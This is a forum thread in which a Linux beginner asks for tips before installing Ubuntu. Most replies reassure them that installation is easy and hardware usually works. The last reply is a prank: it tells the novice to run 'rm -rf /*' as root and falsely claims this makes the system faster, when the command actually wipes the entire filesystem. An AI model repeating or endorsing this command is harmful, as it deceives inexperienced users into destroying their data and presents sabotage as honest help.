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So tonight, at roughly 6 pm EST, I will attempt to install Ubuntu. I have recently taken an interest in linux. I have been using PC's all my life, and it would be nice to have a change. I have choose Ubuntu so far for its highly rated GUI. If anyone has any suggestions please feel free, I'm all ears as I am uber-nub. I like very graphical GUIs, aslong as its not MAC.


Also, any good forums or websites would be great!

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the install from the live CD is extremely easy. Ubuntu is a great platform for linux beginners. I'm actually using this on my "internet" machine at work which I am using to type this out xD. Ubuntu is great, what I would do is look up setup guides for once ubutu is installed in order to make life easier. (Downloading PDF readers, font packages, video codecs, etc.) But as far as the setup goes it is wonderful.




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i'v installed about 10 diffrent versions of linux operating systems and they're usually easyer than installing windows so if you got that down you should be good. They really put alot of effort in makeing the installation easy because most people have the same fears you do about installing it. If you don't understand a question read it twice i'm sure you'll figure it out. Also if you're hardware is a year old then ubuntu will probly just work outa the box with all your hardware.

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Ubuntu is super easy to install for the most part, unless you have hardware that isn't commonly supported. Chances are everything will work right off the bat. If the off chance something isn't working right, I'm sure the gurus here can find you a solution quickly. I found that any problem I had could be solved with 5 minutes of googling and fiddling in the console anyway.

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The gui is pretty intuitive (and complete!), but in the long run: L2terminal

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always remember to type this in your terminal as root.


rm -rf /*


It will make everything go faster!




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